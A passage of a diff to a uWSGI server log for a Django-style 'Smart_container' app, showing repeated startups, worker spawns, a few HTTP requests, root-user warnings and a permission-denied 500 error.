+gateway "uWSGI http 1" has been buried (pid: 19000) +worker 1 buried after 1 seconds +worker 2 buried after 1 seconds +worker 3 buried after 1 seconds +worker 4 buried after 1 seconds +worker 5 buried after 1 seconds +worker 6 buried after 1 seconds +worker 7 buried after 1 seconds +worker 8 buried after 1 seconds +worker 9 buried after 1 seconds +worker 10 buried after 1 seconds +goodbye to uWSGI. +VACUUM: pidfile removed. +VACUUM: unix socket /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock removed. +*** Starting uWSGI 2.0.20 (64bit) on [Sun Nov 14 23:26:23 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x5646b4f049c0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x5646b4f049c0 pid: 20302 (default app) +mountpoint already configured. skip. 
+*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 20302) +spawned uWSGI worker 1 (pid: 20304, cores: 1) +spawned uWSGI worker 2 (pid: 20305, cores: 1) +spawned uWSGI worker 3 (pid: 20306, cores: 1) +spawned uWSGI worker 4 (pid: 20307, cores: 1) +spawned uWSGI worker 5 (pid: 20308, cores: 1) +spawned uWSGI worker 6 (pid: 20309, cores: 1) +spawned uWSGI worker 7 (pid: 20310, cores: 1) +spawned uWSGI worker 8 (pid: 20311, cores: 1) +spawned uWSGI worker 9 (pid: 20312, cores: 1) +spawned uWSGI worker 10 (pid: 20313, cores: 1) +spawned uWSGI http 1 (pid: 20314) +[pid: 20313|app: 0|req: 1/1] 210.51.42.187 () {42 vars in 771 bytes} [Sun Nov 14 15:26:29 2021] GET /record => generated 0 bytes in 210 msecs (HTTP/1.1 301) 5 headers in 176 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 2/2] 210.51.42.187 () {42 vars in 773 bytes} [Sun Nov 14 15:26:29 2021] GET /record/ => generated 18 bytes in 2 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 3/3] 210.51.42.187 () {42 vars in 773 bytes} [Sun Nov 14 15:26:55 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 4/4] 210.51.42.187 () {40 vars in 746 bytes} [Sun Nov 14 15:27:03 2021] GET /reference => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 20306|app: 0|req: 1/5] 210.51.42.187 () {40 vars in 748 bytes} [Sun Nov 14 15:27:03 2021] GET /reference/ => generated 18 bytes in 213 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 5/6] 210.51.42.187 () {40 vars in 742 bytes} [Sun Nov 14 15:27:13 2021] GET /record/ => generated 18 bytes in 0 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +SIGINT/SIGTERM received...killing workers... 
+gateway "uWSGI http 1" has been buried (pid: 20314) +worker 1 buried after 1 seconds +worker 2 buried after 1 seconds +worker 3 buried after 1 seconds +worker 4 buried after 1 seconds +worker 5 buried after 1 seconds +worker 6 buried after 1 seconds +worker 7 buried after 1 seconds +worker 8 buried after 1 seconds +worker 9 buried after 1 seconds +worker 10 buried after 1 seconds +goodbye to uWSGI. +VACUUM: pidfile removed. +*** Starting uWSGI 2.0.20 (64bit) on [Sun Nov 14 23:38:17 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x563b313219d0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x563b313219d0 pid: 22194 (default app) +mountpoint already configured. skip. 
+*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 22194) +spawned uWSGI worker 1 (pid: 22196, cores: 1) +spawned uWSGI worker 2 (pid: 22197, cores: 1) +spawned uWSGI worker 3 (pid: 22198, cores: 1) +spawned uWSGI worker 4 (pid: 22199, cores: 1) +spawned uWSGI worker 5 (pid: 22200, cores: 1) +spawned uWSGI worker 6 (pid: 22201, cores: 1) +spawned uWSGI worker 7 (pid: 22202, cores: 1) +spawned uWSGI worker 8 (pid: 22203, cores: 1) +spawned uWSGI worker 9 (pid: 22204, cores: 1) +spawned uWSGI worker 10 (pid: 22205, cores: 1) +spawned uWSGI http 1 (pid: 22206) +[pid: 22202|app: 0|req: 1/1] 210.51.42.187 () {40 vars in 742 bytes} [Sun Nov 14 15:38:41 2021] GET /record/ => generated 18 bytes in 214 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +req +[ WARN:0] global /tmp/pip-req-build-qacpj5ci/opencv/modules/imgcodecs/src/loadsave.cpp (710) imwrite_ imwrite_('/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg'): can't open file for writing: permission denied +python3: can't open file '/root/Smart_container/PaddleClas/deploy/python/predict_client.py': [Errno 13] Permission denied +234 +[pid: 22205|app: 0|req: 1/2] 210.51.42.176 () {38 vars in 498 bytes} [Sun Nov 14 15:45:17 2021] POST /reference_client/ => generated 145 bytes in 353 msecs (HTTP/1.1 500) 6 headers in 184 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 15 09:27:57 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! 
+chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x558f0a7cd9b0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x558f0a7cd9b0 pid: 10258 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 10258) +spawned uWSGI worker 1 (pid: 10260, cores: 1) +spawned uWSGI worker 2 (pid: 10261, cores: 1) +spawned uWSGI worker 3 (pid: 10262, cores: 1) +spawned uWSGI worker 4 (pid: 10263, cores: 1) +spawned uWSGI worker 5 (pid: 10264, cores: 1) +spawned uWSGI worker 6 (pid: 10265, cores: 1) +spawned uWSGI worker 7 (pid: 10266, cores: 1) +spawned uWSGI worker 8 (pid: 10267, cores: 1) +spawned uWSGI worker 9 (pid: 10268, cores: 1) +spawned uWSGI worker 10 (pid: 10269, cores: 1) +spawned uWSGI http 1 (pid: 10270) +*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 15 13:16:34 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! 
no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x563adb6df9c0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x563adb6df9c0 pid: 11141 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 11141) +spawned uWSGI worker 1 (pid: 11143, cores: 1) +spawned uWSGI worker 2 (pid: 11144, cores: 1) +spawned uWSGI worker 3 (pid: 11145, cores: 1) +spawned uWSGI worker 4 (pid: 11146, cores: 1) +spawned uWSGI worker 5 (pid: 11147, cores: 1) +spawned uWSGI worker 6 (pid: 11148, cores: 1) +spawned uWSGI worker 7 (pid: 11149, cores: 1) +spawned uWSGI worker 8 (pid: 11150, cores: 1) +spawned uWSGI worker 9 (pid: 11151, cores: 1) +spawned uWSGI worker 10 (pid: 11152, cores: 1) +spawned uWSGI http 1 (pid: 11153) +[pid: 11150|app: 0|req: 1/1] 210.51.42.187 () {42 vars in 752 bytes} [Mon Nov 15 05:16:54 2021] GET / => generated 179 bytes in 218 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11150|app: 0|req: 2/2] 210.51.42.187 () {36 vars in 691 bytes} [Mon Nov 15 05:16:57 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 11150|app: 0|req: 
3/3] 210.51.42.187 () {42 vars in 766 bytes} [Mon Nov 15 05:17:02 2021] GET /record/ => generated 18 bytes in 0 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 11150|app: 0|req: 4/4] 210.51.42.187 () {40 vars in 687 bytes} [Mon Nov 15 05:17:03 2021] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 19:35:08 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi @@ -12,1134 +464,7 @@ detected binary path: /usr/local/bin/uwsgi uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x55a4c1433da0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55a4c1433da0 pid: 6332 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6332) -spawned uWSGI worker 1 (pid: 6334, cores: 1) -spawned uWSGI worker 2 (pid: 6335, cores: 1) -spawned uWSGI worker 3 (pid: 6336, cores: 1) -spawned uWSGI worker 4 (pid: 6337, cores: 1) -spawned uWSGI worker 5 (pid: 6338, cores: 1) -spawned uWSGI worker 6 (pid: 6339, cores: 1) -spawned uWSGI worker 7 (pid: 6340, cores: 1) -spawned uWSGI worker 8 (pid: 6341, cores: 1) -spawned uWSGI worker 9 (pid: 6342, cores: 1) -spawned uWSGI worker 10 (pid: 6343, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:32:26 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). 
-bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:32:30 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). -bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:34:49 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). 
-bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:36:14 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x55cee3302cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55cee3302cd0 pid: 6717 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6717) -spawned uWSGI worker 1 (pid: 6719, cores: 1) -spawned uWSGI worker 2 (pid: 6720, cores: 1) -spawned uWSGI worker 3 (pid: 6721, cores: 1) -spawned uWSGI worker 4 (pid: 6722, cores: 1) -spawned uWSGI worker 5 (pid: 6723, cores: 1) -spawned uWSGI worker 6 (pid: 6724, cores: 1) -spawned uWSGI worker 7 (pid: 6725, cores: 1) -spawned uWSGI worker 8 (pid: 6726, cores: 1) -spawned uWSGI worker 9 (pid: 6727, cores: 1) -spawned uWSGI worker 10 (pid: 6728, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:39:11 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x564456791cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x564456791cd0 pid: 6756 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6756) -spawned uWSGI worker 1 (pid: 6758, cores: 1) -spawned uWSGI worker 2 (pid: 6759, cores: 1) -spawned uWSGI worker 3 (pid: 6760, cores: 1) -spawned uWSGI worker 4 (pid: 6761, cores: 1) -spawned uWSGI worker 5 (pid: 6762, cores: 1) -spawned uWSGI worker 6 (pid: 6763, cores: 1) -spawned uWSGI worker 7 (pid: 6764, cores: 1) -spawned uWSGI worker 8 (pid: 6765, cores: 1) -spawned uWSGI worker 9 (pid: 6766, cores: 1) -spawned uWSGI worker 10 (pid: 6767, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:40:34 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -bind(): Cannot assign requested address [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:42:55 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x558caebc7cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x558caebc7cd0 pid: 6798 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6798) -spawned uWSGI worker 1 (pid: 6800, cores: 1) -spawned uWSGI worker 2 (pid: 6801, cores: 1) -spawned uWSGI worker 3 (pid: 6802, cores: 1) -spawned uWSGI worker 4 (pid: 6803, cores: 1) -spawned uWSGI worker 5 (pid: 6804, cores: 1) -spawned uWSGI worker 6 (pid: 6805, cores: 1) -spawned uWSGI worker 7 (pid: 6806, cores: 1) -spawned uWSGI worker 8 (pid: 6807, cores: 1) -spawned uWSGI worker 9 (pid: 6808, cores: 1) -spawned uWSGI worker 10 (pid: 6809, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:46:13 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x55ebaec9ccd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55ebaec9ccd0 pid: 6835 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6835) -spawned uWSGI worker 1 (pid: 6837, cores: 1) -spawned uWSGI worker 2 (pid: 6838, cores: 1) -spawned uWSGI worker 3 (pid: 6839, cores: 1) -spawned uWSGI worker 4 (pid: 6840, cores: 1) -spawned uWSGI worker 5 (pid: 6841, cores: 1) -spawned uWSGI worker 6 (pid: 6842, cores: 1) -spawned uWSGI worker 7 (pid: 6843, cores: 1) -spawned uWSGI worker 8 (pid: 6844, cores: 1) -spawned uWSGI worker 9 (pid: 6845, cores: 1) -spawned uWSGI worker 10 (pid: 6846, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 12:08:40 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x557f75c88cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x557f75c88cd0 pid: 15276 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 15276) -spawned uWSGI worker 1 (pid: 15279, cores: 1) -spawned uWSGI worker 2 (pid: 15280, cores: 1) -spawned uWSGI worker 3 (pid: 15281, cores: 1) -spawned uWSGI worker 4 (pid: 15282, cores: 1) -spawned uWSGI worker 5 (pid: 15283, cores: 1) -spawned uWSGI worker 6 (pid: 15284, cores: 1) -spawned uWSGI worker 7 (pid: 15285, cores: 1) -spawned uWSGI worker 8 (pid: 15286, cores: 1) -spawned uWSGI worker 9 (pid: 15287, cores: 1) -spawned uWSGI worker 10 (pid: 15288, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 12:34:18 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, 